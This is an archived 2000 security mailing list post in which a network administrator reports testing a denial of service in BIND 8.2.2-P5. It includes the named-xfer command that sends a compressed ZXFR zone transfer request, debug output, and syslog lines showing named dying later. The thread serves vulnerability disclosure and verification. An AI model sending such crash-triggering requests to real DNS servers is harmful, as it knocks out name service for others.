Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Possible DOS in Bind 8.2.2-P5 (talked too soon...)

From: Fernando Cardoso <fernando () BN PT>
Date: Wed, 8 Nov 2000 14:10:40 -0000
20 minutes after trying the DoS, named died... No core dumped.

(from /var/log/messages)
Nov  8 11:11:07 dns2 named[309]: approved ZXFR from [x.x.x.1].1795 for
"xxx.org"
Nov  8 11:11:07 dns2 named[309]: unsupported XFR (type ZXFR) of "xxx.org"
(IN) to [x.x.x.1].1795
Nov  8 11:32:40 dns2 named[309]: rm_datum: DB_F_ACTIVE not set
Nov  8 11:32:40 dns2 named[309]: rm_datum: DB_F_ACTIVE not set

Fernando

_________________________________________________________
Fernando Cardoso              Phone:   +351 21 7982186
Network Administrator         Fax:     +351 21 7982185
National Library              E-mail:  fernando () bn pt
Portugal                      PGP ID:  28551CB8




-----Original Message-----
From: Fernando Cardoso
Sent: quarta-feira, 8 de Novembro de 2000 10:26
To: VULN-DEV () SECURITYFOCUS COM
Cc: 'naif () inet it'
Subject: RE: Possible DOS in Bind 8.2.2-P5


Just tried on RedHat 6.0. No DoS...

[root@dns1 /root]# named-xfer -z xxx.org -d 9 -f dump_dns -Z
dns2 -l log.dns

[root@dns1 /root]# cat log.dns.knvl2m
domain `xxx.org'; file `dump_dns'; serial 0
zone found (2): "xxx.org", source = dump_dns
Arg: "dns2" AXFR
addrcnt = 1
getzone() xxx.org secondary
address [x.x.x.2] AXFR
connecting to server #1 [x.x.x.2].53
len = 154
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 62154
;; flags: qr aa ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2
;;      xxx.org, type = SOA, class = IN
xxx.org.            1D IN SOA       dns1. me () somewhere pt. (
                                        200000000      ; serial
                                        8H              ; refresh
                                        2H              ; retry
                                        1W              ; expiry
                                        1D )            ; minimum

xxx.org.            1D IN NS        dns1
xxx.org.            1D IN NS        dns1
dns1          1D IN A         x.x.x.1
dns2          1D IN A         x.x.x.2
need update, serial 200000000
send ZXFR query to x.x.x.2
bufsize = 1024
close(5) succeeded
error receiving zone transfer

[root@dns2 fernando]# tail  /var/log/messages
Nov  8 11:07:56 dns2 named[309]: approved ZXFR from
[x.x.x.1].1793 for "xxx.org"
Nov  8 11:07:56 dns2 named[309]: unsupported XFR (type ZXFR)
of "xxx.org" (IN) to [x.x.x.1].1793

Fernando

_________________________________________________________
Fernando Cardoso              Phone:   +351 21 7982186
Network Administrator         Fax:     +351 21 7982185
National Library              E-mail:  fernando () bn pt
Portugal                      PGP ID:  28551CB8




Hi,
playing with bind and ZXFR feature ( zone transfer compressed
with a possible insecure
execlp("gzip", "gzip", NULL); ), i discovered a Denial Of
Service against Bind 8.2.2-P5 .

By default Bind 8.2.2-P5 it's not compiled with ZXFR support
unless you define it with #define BIND_ZXFR
so it will refuse any ZXFR transfer, because it doesn't support it.
But now what appens? Look here...
[...]
Previous By Date Next
Previous By Thread Next

Current thread: